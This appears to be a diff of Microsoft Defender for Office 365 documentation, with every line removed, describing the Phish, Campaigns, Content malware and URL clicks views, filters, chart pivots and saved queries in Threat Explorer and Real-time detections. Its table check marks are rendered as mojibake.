-|Attachment filename|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File type|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File Extension|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File Size|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|**Authentication**||||
-|SPF|Select one or more values: <ul><li>**Fail**</li><li>**Neutral**</li><li>**None**</li><li>**Pass**</li><li>**Permanent error**</li><li>**Soft fail**</li><li>**Temporary error**</li></ul>|Γ£ö|Γ£ö|
-|DKIM|Select one or more values: <ul><li>**Error**</li><li>**Fail**</li><li>**Ignore**</li><li>**None**</li><li>**Pass**</li><li>**Test**</li><li>**Timeout**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|DMARC|Select one or more values: <ul><li>**Best guess pass**</li><li>**Fail**</li><li>**None**</li><li>**Pass**</li><li>**Permanent error**</li><li>**Selector pass**</li><li>**Temporary error**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Composite|Select one or more values: <ul><li>**Fail**</li><li>**None**</li><li>**Pass**</li><li>**Soft pass**</li></ul>|
-
-### Pivots for the chart in the Phish view in Threat Explorer and Real-time Detections
-
-The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The chart pivots that are available in the **Phish** view in Threat Explorer and Real-time detections are listed in the following table:
-
-|Pivot|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Sender domain**|Γ£ö|Γ£ö|
-|**Sender IP**|Γ£ö||
-|**Delivery action**|Γ£ö|Γ£ö|
-|**Detection technology**|Γ£ö|Γ£ö|
-|**Full URL**|Γ£ö||
-|**URL domain**|Γ£ö|Γ£ö|
-|**URL domain and path**|Γ£ö||
-
-The available chart pivots are described in the following subsections.
-
-#### Sender domain chart pivot in the Phish view in Threat Explorer and Real-time detections
-
-Although this pivot doesn't look selected by default, **Sender domain** is the default chart pivot in the **Phish** view in Real-time detections.
-
-The **Sender domain** pivot organizes the chart by the domains in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each sender domain.
-
-#### Sender IP chart pivot in the Phish view in Threat Explorer
-
-The **Sender IP** pivot organizes the chart by the source IP addresses of messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each source IP address.
-
-#### Delivery action chart pivot in the Phish view in Threat Explorer and Real-time detections
-
-Although this pivot doesn't look selected by default, **Delivery action** is the default chart pivot in the **Phish** view in Threat Explorer.
-
-The **Delivery action** pivot organizes the chart by the actions taken on messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each delivery action.
-
-#### Detection technology chart pivot in the Phish view in Threat Explorer and Real-time detections
-
-The **Detection technology** pivot organizes the chart by the feature that identified the phishing messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each detection technology.
-
-#### Full URL chart pivot in the Phish view in Threat Explorer
-
-The **Full URL** pivot organizes the chart by the full URLs in phishing messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each full URL.
-
-#### URL domain chart pivot in the Phish view in Threat Explorer and Real-time detections
-
-The **URL domain** pivot organizes the chart by the domains in URLs in phishing messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain.
-
-#### URL domain and path chart pivot in the Phish view in Threat Explorer
-
-The **URL domain and path** pivot organizes the chart by the domains and paths in URLs in phishing messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain and path.
-
-### Views for the details area of the Phish view in Threat Explorer
-
-The available views (tabs) in the details area of the **Phish** view are listed in the following table, and are described in the following subsections.
-
-|View|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Email**|Γ£ö|Γ£ö|
-|**URL clicks**|Γ£ö|Γ£ö|
-|**Top URLs**|Γ£ö|Γ£ö|
-|**Top clicks**|Γ£ö|Γ£ö|
-|**Top targeted users**|Γ£ö||
-|**Email origin**|Γ£ö||
-|**Campaign**|Γ£ö||
-
-#### Email view for the details area of the Phish view in Threat Explorer and Real-time detections
-
-**Email** is the default view for the details area of the **Phish** view in Threat Explorer and Real-time detections.
-
-The **Email** view shows a details table. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown.
-
-The following table shows the columns that are available in Threat Explorer and Real-time detections. The default values are marked with an asterisk (<sup>\*</sup>).
-
-|Column|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Date**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Subject**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Recipient**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Recipient domain**|Γ£ö|Γ£ö|
-|**Tags**<sup>\*</sup>|Γ£ö||
-|**Sender address**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Sender display name**|Γ£ö|Γ£ö|
-|**Sender domain**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Sender IP**|Γ£ö|Γ£ö|
-|**Sender mail from address**|Γ£ö|Γ£ö|
-|**Sender mail from domain**|Γ£ö|Γ£ö|
-|**Additional actions**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Delivery action**|Γ£ö|Γ£ö|
-|**Latest delivery location**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Original delivery location**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**System overrides source**|Γ£ö|Γ£ö|
-|**System overrides**|Γ£ö|Γ£ö|
-|**Alert ID**|Γ£ö|Γ£ö|
-|**Internet message ID**|Γ£ö|Γ£ö|
-|**Network message ID**|Γ£ö|Γ£ö|
-|**Mail language**|Γ£ö|Γ£ö|
-|**Exchange transport rule**|Γ£ö||
-|**Connector**|Γ£ö||
-|**Phish confidence level**|Γ£ö||
-|**Context**|Γ£ö||
-|**Data loss prevention rule**|Γ£ö||
-|**Threat type**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Detection technology**|Γ£ö|Γ£ö|
-|**Attachment Count**|Γ£ö|Γ£ö|
-|**URL Count**|Γ£ö|Γ£ö|
-|**Email size**|Γ£ö|Γ£ö|
-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> Customized column settings are saved per user. Customized column settings in Incognito or InPrivate browsing mode are saved until you close the web browser.
-
-When you select one or more entries from the list by selecting the check box next to the first column, **Message actions** is available. For information, see [Threat hunting: Email remediation](threat-explorer-threat-hunting.md#email-remediation).
-
-When you click on the **Subject** or **Recipient** values in an entry, details flyouts open. These flyouts are described in the following subsections.
-
-##### Email details from the Email view of the details area in the Phish view
-
-When you select the **Subject** value of an entry in the table, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains standardized summary information that's also available on the [Email entity page](mdo-email-entity-page.md) for the message.
-
-For details about the information in the Email summary panel, see [The Email summary panel in Defender for Office 365 features](mdo-email-entity-page.md#the-email-summary-panel).
-
-The available actions at the top of the Email summary panel for Threat Explorer and Real-time detections are described in the [Email details from the Email view of the details area in the All email view](#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view).
-
-##### Recipient details from the Email view of the details area in the Phish view
-
-When you select an entry by clicking on the **Recipient** value, a details flyout opens. The information in the flyout is the same as described in [Recipient details from the Email view of the details area in the All email view](#recipient-details-from-the-email-view-of-the-details-area-in-the-all-email-view).
-
-#### URL clicks view for the details area of the Phish view in Threat Explorer and Real-time detections
-
-The **URL clicks** view shows a chart that can be organized using pivots. The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The chart pivots that are available in the **Malware** view in Threat Explorer and Real-time detections are described in the following table:
-
-|Pivot|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**URL domain**|Γ£ö|Γ£ö|
-|**Click verdict**|Γ£ö|Γ£ö|
-|**URL**|Γ£ö||
-|**URL domain and path**|Γ£ö||
-
-The same chart pivots are available and described for the **All email** view in Threat Explorer:
--- [URL domain pivot for the URL clicks view for the details area of the All email view in Threat Explorer](#url-domain-pivot-for-the-url-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [Click verdict pivot for the URL clicks view for the details area of the All email view in Threat Explorer](#click-verdict-pivot-for-the-url-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [URL pivot for the URL clicks view for the details area of the All email view in Threat Explorer](#url-pivot-for-the-url-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)-- [URL domain and path pivot for the URL clicks view for the details area of the All email view in Threat Explorer](#url-domain-and-path-pivot-for-the-url-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer)--
-> [!TIP]
-> In Threat Explorer, each pivot in **URL clicks** view has a :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View all clicks** action that opens the [URL clicks view in Threat Explorer](#url-clicks-view-in-threat-explorer) in a new tab. This action isn't available in Real-time detections, because the **URL clicks** view isn't available in Real-time detections.
-
-#### Top URLs view for the details area of the Phish view in Threat Explorer and Real-time detections
-
-The **Top URLs** view shows a details table. You can sort the entries by clicking on an available column header:
--- **URL**-- **Messages blocked**-- **Messages junked**-- **Messages delivered**-
-##### Top URLs details for the Phish view
-
-When you select an entry by clicking anywhere in the row other than the check box next to the first column, a details flyout opens. The information in the flyout is the same as described in [Top URLs details for the All email view](#top-urls-details-for-the-all-email-view).
-
-> [!TIP]
-> The :::image type="icon" source="../../media/m365-cc-sc-go-hunt-icon.png" border="false"::: **Go hunt** action is available only in Threat Explorer. It isn't available in Real-time detections.
-
-#### Top clicks view for the details area of the Phish view in Threat Explorer and Real-time detections
-
-The **Top clicks** view shows a details table. You can sort the entries by clicking on an available column header:
--- **URL**-- **Blocked**-- **Allowed**-- **Block overridden**-- **Pending verdict**-- **Pending verdict bypassed**-- **None**-- **Error page**-- **Failure**-
-> [!TIP]
-> All available columns are selected. If you select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**, you can't deselect any columns.
->
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Zoom out in your web browser.
-
-When you select an entry by clicking anywhere in the row other than the check box next to the first column, a details flyout opens. The information in the flyout is the same as described in [Top URLs details for the All email view](#top-urls-details-for-the-all-email-view).
-
-#### Top targeted users view for the details area of the Phish view in Threat Explorer
-
-The **Top targeted users** view organizes the data into a table of the top five recipients who were targeted by phishing attempts. The table shows:
--- **Top targeted users**: The email address of the top targeted user. If you select an email address, a details flyout opens. The information in the flyout is the same as described in [Top targeted users view for the details area of the All email view in Threat Explorer](#top-targeted-users-view-for-the-details-area-of-the-all-email-view-in-threat-explorer).--- The number of attempts: If you select the number of attempts, Threat Explorer opens in a new tab filtered by the malware family name.-
-> [!TIP]
-> Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of up to 3000 users and the corresponding attempts.
-
-#### Email origin view for the details area of the Phish view in Threat Explorer
-
-The **Email origin** view shows message sources on a map of the world.
-
-#### Campaign view for the details area of the Phish view in Threat Explorer
-
-The **Campaign** view shows a details table. You can sort the entries by clicking on an available column header.
-
-The information in the table is the same as described in [details table on the Campaigns page](campaigns.md#details-area-on-the-campaigns-page).
-
-When you select an entry by clicking anywhere in the row other than the check box next to the **Name**, a details flyout opens. The information in the flyout is the same as described in [Campaign details](campaigns.md#campaign-details).
-
-## Campaigns view in Threat Explorer
-
-The **Campaigns** view in Threat Explorer shows information about threats that were identified as coordinated phishing and malware attacks, either specific to your organization, or to other organizations in Microsoft 365.
-
-To open the **Campaigns** view on the **Explorer** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Campaigns** tab. Or, go directly to the **Explorer** page using <https://security.microsoft.com/threatexplorerv3>, and then select the **Campaigns** tab.
-
-All of the available information and actions are identical to the information and actions on the **Campaigns** page at <https://security.microsoft.com/campaignsv3>. For more information, see [Campaigns page in the Microsoft Defender portal](campaigns.md#campaigns-page-in-the-microsoft-defender-portal).
--
-## Content malware view in Threat Explorer and Real-time detections
-
-The **Content malware** view in Threat Explorer and Real-time detections shows information about files that were identified as malware by:
--- [Built-in virus protection in SharePoint, OneDrive, and Microsoft Teams](anti-malware-protection-for-spo-odfb-teams-about.md)-- [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).-
-To open the **Content malware** view, do one of the following steps:
--- **Threat Explorer**: On the **Explorer** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Content malware** tab. Or, go directly to the **Explorer** page using <https://security.microsoft.com/threatexplorerv3>, and then select the **Content malware** tab.-- **Real-time detections**: On the **Real-time detections** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Content malware** tab. Or, go directly to the **Real-time detections** page using <https://security.microsoft.com/realtimereportsv3>, and then select the **Content malware** tab.--
-### Filterable properties in the Content malware view in Threat Explorer and Real-time detections
-
-By default, no property filters are applied to the data. The steps to create filters (queries) are described in the [Filters in Threat Explorer and Real-time detections](#property-filters-in-threat-explorer-and-real-time-detections) section later in this article.
-
-The filterable properties that are available in the **File name** box in the **Content malware** view in Threat Explorer and Real-time detections are described in the following table:
-
-|Property|Type|Threat<br/>Explorer|Real-time<br/>detections|
-|||::|::|
-|**File**||||
-|File name|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Workload|Select one or more values: <ul><li>**OneDrive**</li><li>**SharePoint**</li><li>**Teams**</li></ul>|Γ£ö|Γ£ö|
-|Site|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File owner|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Last modified by|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|SHA256|Integer. Separate multiple values by commas. <br/><br/> To find the SHA256 hash value of a file in Windows, run the following command in a Command Prompt: `certutil.exe -hashfile "<Path>\<Filename>" SHA256`.|Γ£ö|Γ£ö|
-|Malware family|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Detection technology|Select one or more values: <ul><li>**Advanced filter**</li><li>**Antimalware protection**</li><li>**Bulk**</li><li>**Campaign**</li><li>**Domain reputation**</li><li>**File detonation**</li><li>**File detonation reputation**</li><li>**File reputation**</li><li>**Fingerprint matching**</li><li>**General filter**</li><li>**Impersonation brand**</li><li>**Impersonation domain**</li><li>**Impersonation user**</li><li>**IP reputation**</li><li>**Mailbox intelligence impersonation**</li><li>**Mixed analysis detection**</li><li>**spoof DMARC**</li><li>**Spoof external domain**</li><li>**Spoof intra-org**</li><li>**URL detonation**</li><li>**URL detonation reputation**</li><li>**URL malicious reputation**</li></ul>|Γ£ö|Γ£ö|
-|Threat type|Select one or more values: <ul><li>**Block**</li><li>**Malware**</li><li>**Phish**</li><li>**Spam**</li></ul>|Γ£ö|Γ£ö|
-
-### Pivots for the chart in the Content malware view in Threat Explorer and Real-time Detections
-
-The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The chart pivots that are available in the **Content malware** view in Threat Explorer and Real-time detections are listed in the following table:
-
-|Pivot|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Malware family**|Γ£ö|Γ£ö|
-|**Detection technology**|Γ£ö|Γ£ö|
-|**Workload**|Γ£ö|Γ£ö|
-
-The available chart pivots are described in the following subsections.
-
-#### Malware family chart pivot in the Content malware view in Threat Explorer and Real-time detections
-
-Although this pivot doesn't look selected by default, **Malware family** is the default chart pivot in the **Content malware** view in Threat Explorer and Real-time detections.
-
-The **Malware family** pivot organizes the chart by the malware identified in files in SharePoint, OneDrive, and Microsoft Teams using the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each malware family.
-
-#### Detection technology chart pivot in the Content malware view in Threat Explorer and Real-time detections
-
-The **Detection technology** pivot organizes the chart by the feature that identified malware in files in SharePoint, OneDrive, and Microsoft Teams for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each detection technology.
-
-#### Workload chart pivot in the Content malware view in Threat Explorer and Real-time detections
-
-The **Workload** pivot organizes the chart by where the malware was identified (SharePoint, OneDrive, or Microsoft Teams) for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each workload.
-
-### Views for the details area of the Content malware view in Threat Explorer and Real-time detections
-
-In Threat Explorer and Real-time detections, the details area of the **Content malware** view contains only one view (tab) named **Documents**. This view is described in the following subsection.
-
-#### Document view for the details area of the Content malware view in Threat Explorer and Real-time detections
-
-**Document** is the default and only view for the details area in the **Content malware** view.
-
-The **Document** view shows a details table. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Date**<sup>\*</sup>-- **Name**<sup>\*</sup>-- **Workload**<sup>\*</sup>-- **Threat**<sup>\*</sup>-- **Detection technology**<sup>\*</sup>-- **Last modifying user**<sup>\*</sup>-- **File owner**<sup>\*</sup>-- **Size (bytes)**<sup>\*</sup>-- **Last modified time**-- **Site path**-- **File path**-- **Document ID**-- **SHA256**-- **Detected date**-- **Malware family**-- **Context**-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> Customized column settings are saved per user. Customized column settings in Incognito or InPrivate browsing mode are saved until you close the web browser.
-
-When you select a filename value from the **Name** column, a details flyout opens. The flyout contains the following information:
--- **Summary** section:
- - **Filename**
- - **Site path**
- - **File path**
- - **Document ID**
- - **SHA256**
- - **Last date modified**
- - **Last modified by**
- - **Threat**
- - **Detection technology**
-- **Details** section:
- - **Detected date**
- - **Detected by**
- - **Malware name**
- - **Last modified by**
- - **File size**
- - **File owner**
-- **Email list** section: A table showing the following related information for messages that contain the malware file:
- - **Date**
- - **Subject**
- - **Recipient**
-
- Select **View all email** to open Threat Explorer in a new tab filtered by the malware family name.
--- **Recent activity**: Shows the summarized results of an [Audit log search](/purview/audit-new-search) for the recipient:
- - **Date**
- - **IP address**
- - **Activity**
- - **Item**
-
- If the recipient has more than three audit log entries, select **View all recent activity** to see all of them.
-
- > [!TIP]
- > Members of the **Security Administrators** role group in [Email & collaboration permissions](mdo-portal-permissions.md) can't expand the **Recent activity** section. You need to be a member of a role group in [Exchange Online permissions](/exchange/permissions-exo/permissions-exo) that has the **Audit Logs**, **Information Protection Analyst**, or **Information Protection Investigator** roles assigned. By default, those roles are assigned to the **Records Management**, **Compliance Management**, **Information Protection**, **Information Protection Analysts**, **Information Protection Investigators**, and **Organization Management** role groups. You can add the members of **Security Administrators** to those role groups, or you can [create a new role group](/exchange/recipients-in-exchange-online/manage-permissions-for-recipients#use-the-eac-to-assign-permissions-to-individual-mailboxes) with with the **Audit Logs** role assigned.
--
-## URL clicks view in Threat Explorer
-
-The **URL clicks** view in Threat Explorer shows all user clicks on URLs in email, in supported Office files in SharePoint and OneDrive, and in Microsoft Teams.
-
-To open the **URL clicks** view on the **Explorer** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **URL clicks** tab. Or, go directly to the **Explorer** page using <https://security.microsoft.com/threatexplorerv3>, and then select the **URL clicks** tab.
--
-### Filterable properties in the URL clicks view in Threat Explorer
-
-By default, no property filters are applied to the data. The steps to create filters (queries) are described in the [Filters in Threat Explorer and Real-time detections](#property-filters-in-threat-explorer-and-real-time-detections) section later in this article.
-
-The filterable properties that are available in the **Recipients** box in the **URL clicks** view in Threat Explorer are described in the following table:
-
-|Property|Type|
-|||
-|**Basic**||
-|Recipients|Text. Separate multiple values by commas.|
-|Tags|Text. Separate multiple values by commas. <br/><br/> For more information about user tags, see [User tags](user-tags-about.md).|
-|Network message ID|Text. Separate multiple values by commas. <br/><br/> A GUID value that's available in the **X-MS-Exchange-Organization-Network-Message-Id** header field in the message header.|
-|URL|Text. Separate multiple values by commas.|
-|Click action|Select one or more values: <ul><li>**Allowed**</li><li>**Block page**</li><li>**Block page override**</li><li>**Error page**</li><li>**Failure**</li><li>**None**</li><li>**Pending detonation page**</li><li>**Pending detonation page override**</li></ul>|
-|Threat type|Select one or more values: <ul><li>**Allow**</li><li>**Block**</li><li>**Malware**</li><li>**Phish**</li><li>**Spam**</li></ul>|
-|Detection technology|Select one or more values: <ul><li>**URL detonation**</li><li>**URL detonation reputation**</li><li>**URL malicious reputation**</li></ul>|
-|Click ID|Text. Separate multiple values by commas.|
-|Client IP|Text. Separate multiple values by commas.|
-
-### Pivots for the chart in the URL clicks view in Threat Explorer
-
-The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The available chart pivots are described in the following subsections.
-
-#### URL domain chart pivot in the URL clicks view in Threat Explorer
-
-Although this pivot doesn't look selected by default, **URL domain** is the default chart pivot in the **URL clicks** view.
-
-The **URL domain** pivot organizes the chart by the domains in URLs that users clicked in email, Office files, or Microsoft Teams for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each URL domain.
-
-#### Workload chart pivot in the URL clicks view in Threat Explorer
-
-The **Workload** pivot organizes the chart by the location of the clicked URL (email, Office files, or Microsoft Teams) for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each workload.
-
-#### Detection technology chart pivot in the URL clicks view in Threat Explorer
-
-The **Detection technology** pivot organizes the chart by the feature that identified the URL clicks in email, Office files, or Microsoft Teams for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each detection technology.
-
-#### Threat type chart pivot in the URL clicks view in Threat Explorer
-
-The **Threat type** pivot organizes the chart by the results for clicked URLs in email, Office files, or Microsoft Teams for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each threat type technology.
-
-### Views for the details area of the URL clicks view in Threat Explorer
-
-The available views (tabs) in the details area of the **URL clicks** view are described in the following subsections.
-
-#### Results view for the details area of the URL clicks view in Threat Explorer
-
-**Results** is the default view for the details area in the **URL clicks** view.
-
-The **Results** view shows a details table. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all columns are selected:
--- **Time clicked**-- **Recipient**-- **URL click action**-- **URL**-- **Tags**-- **Network message ID**-- **Click ID**-- **Client IP**-- **URL chain**-- **Threat type**-- **Detection technology**-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> Customized column settings are saved per user. Customized column settings in Incognito or InPrivate browsing mode are saved until you close the web browser.
-
-Select one or entries by selecting the check box next to the first column in the row, and then select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View all emails** to open Threat Explorer in **All email** view in a new tab filtered by the **Network message ID** values of the selected messages.
-
-#### Top clicks view for the details area of the URL clicks view in Threat Explorer
-
-The **Top clicks** view shows a details table. You can sort the entries by clicking on an available column header:
--- **URL**-- **Blocked**-- **Allowed**-- **Block overridden**-- **Pending verdict**-- **Pending verdict bypassed**-- **None**-- **Error page**-- **Failure**-
-> [!TIP]
-> All available columns are selected. If you select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**, you can't deselect any columns.
->
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Zoom out in your web browser.
-
-Select an entry by selecting the check box next to the first column in the row, and then select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View all clicks** to open Threat Explorer in a new tab in **URL clicks** view.
-
-When you select an entry by clicking anywhere in the row other than the check box next to the first column, a details flyout opens. The information in the flyout is the same as described in [Top URLs details for the All email view](#top-urls-details-for-the-all-email-view).
-
-#### Top targeted users view for the details area of the URL clicks view in Threat Explorer
-
-The **Top targeted users** view organizes the data into a table of the top five recipients who clicked on URLs. The table shows:
--- **Top targeted users**: The email address of the top targeted user. If you select an email address, a details flyout opens. The information in the flyout is the same as described in [Top targeted users view for the details area of the All email view in Threat Explorer](#top-targeted-users-view-for-the-details-area-of-the-all-email-view-in-threat-explorer).--- The number of attempts: If you select the number of attempts, Threat Explorer opens in a new tab filtered by the malware family name.-
-> [!TIP]
-> Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of up to 3000 users and the corresponding attempts.
-
-## Property filters in Threat Explorer and Real-time detections
-
-The basic syntax of a property filter/query is:
-
-Condition = \<Filter property\> \<Filter operator> \<Property value or values\>
-
-Multiple conditions use the following syntax:
-
-\<Condition1> \<AND | OR\> \<Condition2> \<AND | OR\> \<Condition3>... \<AND | OR\> \<ConditionN>
-
-> [!TIP]
-> Wildcard searches (**\*** or **?**) aren't supported in text or integer values. The **Subject** property uses partial text matching, and yields results similar to a wildcard search.
-
-The steps to create property filter/query conditions are the same in all views in Threat Explorer and Real-time detections:
-
-1. Identify the filter property using the tables in the preview view description sections earlier in this article.
-
-2. Select an available filter operator. The available filter operators depend on the property type as described in the following table:
-
- |Filter operator|Property type|
- |||
- |**Equal any of**|Text <br/> Integer <br/> Discreet values|
- |**Equal none of**|Text <br/> Discreet values|
- |**Greater than**|Integer|
- |**Less than**|Integer|
-
-3. Enter or select one or more property values. For text values and integers, you can enter multiple values separated by commas.
-
- Multiple values in the property value use the OR logical operator. For example, **Sender address** \> **Equal any of** \> `bob@fabrikam.com,cindy@fabrikam.com` means **Sender address** \> **Equal any of** \> `bob@fabrikam.com` OR `cindy@fabrikam.com`.
-
- After you enter or select one or more property values, the completed filter condition appears below the filter creation boxes.
-
- > [!TIP]
- > For properties that require you to select one or more available values, using the property in the filter condition with all values selected has the same result as not using the property in the filter condition.
-
-4. To add another condition, repeat the previous three steps.
-
- The conditions below the filter creation boxes are separated by the logical operator that was selected at the time you created the second or subsequent conditions. The default value is **AND**, but you can also select **OR**.
-
- The same logical operator is used between all conditions: they're all **AND** or they're all **OR**. To change the existing logical operators, select the logical operator box, and then select **AND** or **OR**.
-
- To edit an existing condition, double-click on it to bring the selected property, filter operator, and values back into the corresponding boxes.
-
- To remove an existing condition, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: on the condition.
-
-5. To apply the filter to the chart and the details table, select **Refresh**
-
- :::image type="content" source="../../media/te-rtd-query-builder.png" alt-text="Screenshot of an example query in Threat Explorer or Real-time detections showing multiple conditions." lightbox="../../media/te-rtd-query-builder.png":::
-
-### Saved queries in Threat Explorer
-
-> [!TIP]
-> **Save query** is part of [Threat trackers](threat-trackers.md) and isn't available in Real-time detections. Saved queries and Threat trackers are available only in Defender for Office 365 Plan 2.
->
-> **Save query** isn't available in the [Content malware view](#content-malware-view-in-threat-explorer-and-real-time-detections).
-
-Most views in Threat Explorer allow you to save filters (queries) for later use. Saved queries are available on the **Threat tracker** page in the Defender portal at <https://security.microsoft.com/threattrackerv2>. For more information about Threat trackers, see [Threat trackers in Microsoft Defender for Office 365 Plan 2](threat-trackers.md).
-
-To save queries in Threat Explorer, do the following steps:
-
-1. After you create the filter/query as previously described, select **Save query** \> :::image type="icon" source="../../media/m365-cc-sc-save-icon.png" border="false"::: **Save query**.
-
-2. In the **Save query** flyout that opens, configure the following options:
- - **Query name**: Enter a unique name for the query.
- - Select one of the following options:
- - **Exact dates**: Select a start date and end date in the boxes. The oldest start date that you can select is 30 days before today. The newest end date that you can select is today.
- - **Relative dates**: Select the number of days in the **Show last nn days when search is run**. The default value is 7, but you can select 1 to 30.
- - **Track query**: By default, this option isn't selected. This option affects whether the query runs automatically:
- - **Track query** not selected: The query is available for you to run manually in Threat Explorer. The query is saved on the **Saved queries** tab on the **Threat tracker** page with the **Tracked query** property value **No**.
- - **Track query** selected: The query periodically runs in the background. The query is available on the **Saved queries** tab on the **Threat tracker** page with the **Tracked query** property value **Yes**. The periodic results of the query are shown on the **Tracked queries** tab on the **Threat tracker** page.
-
- When you're finished in the **Save query** flyout, select **Save**, and then select **OK** in the confirmation dialog.
--
-On the **Saved query** or **Tracked query** tabs on the **Threat tracker** page in the Defender portal at <https://security.microsoft.com/threattrackerv2>, you can select **Explore** in the **Actions** column to open and use the query in Threat Explorer.
-
-When you open the query by selecting **Explore** from the **Threat tracker** page, :::image type="icon" source="../../media/m365-cc-sc-save-icon.png" border="false"::: **Save query as** and :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Saved query settings** are now available in **Save query** on the **Explorer** page:
--- If you select :::image type="icon" source="../../media/m365-cc-sc-save-icon.png" border="false"::: **Save query as**, the **Save query** flyout opens with all previously selected settings. If you make changes, select **Save**, and then select **OK** in the **Success** dialog, the updated query is saved as a new query on the **Threat tracker** page (you might need to select :::image type="icon" source="../../media/m365-cc-sc-refresh-icon.png" border="false":::**Refresh** to see it).--- If you select :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Saved query settings**, the **Saved query settings** flyout opens where you can update the date and **Track query** settings of the existing query.--
-## More information
--- [Threat Explorer collect email details on the Email entity page](mdo-email-entity-page.md)-- [Find and investigate malicious email that was delivered](threat-explorer-investigate-delivered-malicious-email.md)-- [View malicious files detected in SharePoint Online, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md)-- [Threat protection status report](reports-email-security.md#threat-protection-status-report)-- [Automated investigation and response in Microsoft Threat Protection](air-about.md)
